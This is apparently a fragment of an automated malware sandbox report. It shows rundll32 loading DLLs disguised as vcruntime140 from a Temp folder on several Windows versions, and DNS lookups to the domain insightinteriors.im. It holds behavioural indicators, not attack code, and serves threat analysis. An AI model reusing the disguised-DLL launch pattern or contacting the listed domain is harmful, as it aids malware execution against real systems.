C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Maintenance\vcruntime140.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | insightinteriors.im | udp |
| US | 52.111.227.14:443 | tcp |
Files
Analysis: behavioral14
Detonation Overview
Submitted
2024-05-30 19:13
Reported
2024-05-30 19:17
Platform
win10-20240404-en
Max time kernel
134s
Max time network
139s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Maintenance\vcruntime140Org.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 235.137.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.173.189.20.in-addr.arpa | udp |
Files
Analysis: behavioral16
Detonation Overview
Submitted
2024-05-30 19:13
Reported
2024-05-30 19:17
Platform
win11-20240508-en
Max time kernel
89s
Max time network
99s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Maintenance\vcruntime140Org.dll,#1
Network
Files
Analysis: behavioral9
Detonation Overview
Submitted
2024-05-30 19:13
Reported
2024-05-30 19:17
Platform
win7-20240419-en
Max time kernel
119s
Max time network
123s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Maintenance\vcruntime140.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | insightinteriors.im | udp |